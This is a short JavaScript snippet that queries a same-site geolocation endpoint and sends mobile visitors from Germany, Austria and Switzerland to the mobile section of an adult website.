req = new XMLHttpRequest();
req.onreadystatechange=function() {
  if (req.readyState==4 && req.status==200) {
    var s = req.responseText;
    var mob = s.substr(0,1)=="1";
    var con = s.substr(1,3);
    if (mob && (con=="DEU" || con=="AUT" || con=="CHE")) {
        location.replace("http://www.toppornpictures.com/p2mobile/");  
    }
  }
}
req.open("GET", "/geomob.php", true);
req.send();
